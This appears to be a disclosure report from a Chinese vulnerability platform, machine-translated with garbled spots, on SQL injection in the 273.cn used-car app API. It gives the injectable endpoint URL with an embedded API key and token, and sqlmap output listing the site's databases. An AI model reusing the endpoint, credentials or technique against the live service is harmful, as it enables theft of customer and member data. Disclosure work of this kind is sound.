漏洞标题 APP Security 273二手车交易网一次SQL注入（170万销售汽车信息/610,000名会员） 相关制造商 273.cn 漏洞作者 枭龙 提交时间 2016-04-25 07: 58 公共时间 2016-06-13 11: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +数字式注入，php +字符类型注入，第三方不可信程序 漏洞详细信息 https://appserv.273.cn/1.3/search.getSaleDetail?_api_time=1461506128&_api_key=fa1f58046f169f08d3ebf086a11399e4&_api_token=ObudatLb7UdJcaOUfxOQKM6NszavuNMsJXRkJYiXZ%2BAup64TgIbKnvC%2Fb9rh7mjw&_app_source=3&_app_type=2&_app_version=3.2.0&id=18020272 我存在注入 APP 可用数据库[14]: [*]拍卖 [*] car_check [*] car_friend [*] car_type [*] ct [*]发行 [*] information_schema [*]日志 [*] mbs [*] mbs_o2m [*] saleapp 从对等方接收数据时失败 [22: 31: 36] [INFO]获取记录到'C: \ Users \ Administrato下的文本文件的数据 r \ .sqlmap \输出\ appserv.273.cn” 漏洞证明： 11 修理计划： 二十二 版权声明：请注明出处。骁龙@乌云